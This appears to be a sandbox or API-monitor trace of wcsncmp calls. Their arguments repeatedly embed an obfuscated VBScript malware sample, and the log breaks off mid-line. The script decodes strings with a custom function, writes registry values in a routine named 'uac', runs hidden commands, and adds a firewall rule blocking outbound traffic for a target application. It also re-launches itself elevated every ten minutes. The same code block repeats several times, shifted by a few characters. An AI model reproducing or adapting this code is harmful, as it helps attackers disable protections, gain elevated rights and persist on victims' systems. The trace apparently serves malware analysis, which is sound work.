0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101 [0226.347] wcsncmp (_String1="1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 36 [0226.347] wcsncmp (_String1=")) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 28 [0226.347] wcsncmp (_String1=") then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 28 [0226.347] wcsncmp (_String1=" then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.348] wcsncmp (_String1="then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add 